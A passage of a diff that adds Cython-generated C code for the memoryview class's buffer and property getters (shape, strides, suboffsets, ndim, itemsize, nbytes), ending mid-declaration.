+ } + + /* "View.MemoryView":544 + * info.format = self.view.format + * else: + * info.format = NULL # <<<<<<<<<<<<<< + * + * info.buf = self.view.buf + */ + /*else*/ { + __pyx_v_info->format = NULL; + } + __pyx_L9:; + + /* "View.MemoryView":546 + * info.format = NULL + * + * info.buf = self.view.buf # <<<<<<<<<<<<<< + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + */ + __pyx_t_5 = __pyx_v_self->view.buf; + __pyx_v_info->buf = __pyx_t_5; + + /* "View.MemoryView":547 + * + * info.buf = self.view.buf + * info.ndim = self.view.ndim # <<<<<<<<<<<<<< + * info.itemsize = self.view.itemsize + * info.len = self.view.len + */ + __pyx_t_6 = __pyx_v_self->view.ndim; + __pyx_v_info->ndim = __pyx_t_6; + + /* "View.MemoryView":548 + * info.buf = self.view.buf + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize # <<<<<<<<<<<<<< + * info.len = self.view.len + * info.readonly = self.view.readonly + */ + __pyx_t_7 = __pyx_v_self->view.itemsize; + __pyx_v_info->itemsize = __pyx_t_7; + + /* "View.MemoryView":549 + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + * info.len = self.view.len # <<<<<<<<<<<<<< + * info.readonly = self.view.readonly + * info.obj = self + */ + __pyx_t_7 = __pyx_v_self->view.len; + __pyx_v_info->len = __pyx_t_7; + + /* "View.MemoryView":550 + * info.itemsize = self.view.itemsize + * info.len = self.view.len + * info.readonly = self.view.readonly # <<<<<<<<<<<<<< + * info.obj = self + * + */ + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_v_info->readonly = __pyx_t_1; + + /* "View.MemoryView":551 + * info.len = self.view.len + * info.readonly = self.view.readonly + * info.obj = self # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":556 + * @property + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) # <<<<<<<<<<<<<< + * transpose_memslice(&result.from_slice) + * return result + */ + __pyx_t_1 = __pyx_memoryview_copy_object(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 556, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_memoryviewslice_type))))) __PYX_ERR(1, 556, __pyx_L1_error) + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":557 + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_t_2 = __pyx_memslice_transpose((&__pyx_v_result->from_slice)); if (unlikely(__pyx_t_2 == ((int)-1))) __PYX_ERR(1, 557, __pyx_L1_error) + + /* "View.MemoryView":558 + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) + * return result # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.T.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":562 + * @property + * def base(self): + * return self._get_base() # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->_get_base(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 562, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.base.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":565 + * + * cdef _get_base(self): + * return self.obj # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->obj); + __pyx_r = __pyx_v_self->obj; + goto __pyx_L0; + + /* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_7genexpr__pyx_v_length; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":569 + * @property + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_7genexpr__pyx_v_length = (__pyx_t_2[0]); + __pyx_t_5 = PyInt_FromSsize_t(__pyx_7genexpr__pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + } /* exit inner scope */ + __pyx_t_5 = PyList_AsTuple(((PyObject*)__pyx_t_1)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.shape.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr1__pyx_v_stride; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + __pyx_t_1 = (__pyx_v_self->view.strides == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":575 + * if self.view.strides == NULL: + * + * raise ValueError, "Buffer view does not expose strides" # <<<<<<<<<<<<<< + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Buffer_view_does_not_expose_stri, 0, 0); + __PYX_ERR(1, 575, __pyx_L1_error) + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + } + + /* "View.MemoryView":577 + * raise ValueError, "Buffer view does not expose strides" + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.strides + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.strides; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr1__pyx_v_stride = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr1__pyx_v_stride); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.strides.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr2__pyx_v_suboffset; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + __pyx_t_1 = (__pyx_v_self->view.suboffsets == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PySequence_Multiply(__pyx_tuple__4, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + } + + /* "View.MemoryView":584 + * return (-1,) * self.view.ndim + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.suboffsets + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.suboffsets; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr2__pyx_v_suboffset = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr2__pyx_v_suboffset); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.suboffsets.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":588 + * @property + * def ndim(self): + * return self.view.ndim # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 588, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.ndim.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":592 + * @property + * def itemsize(self): + * return self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.itemsize.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":596 + * @property + * def nbytes(self): + * return self.size * self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_size); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.nbytes.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject 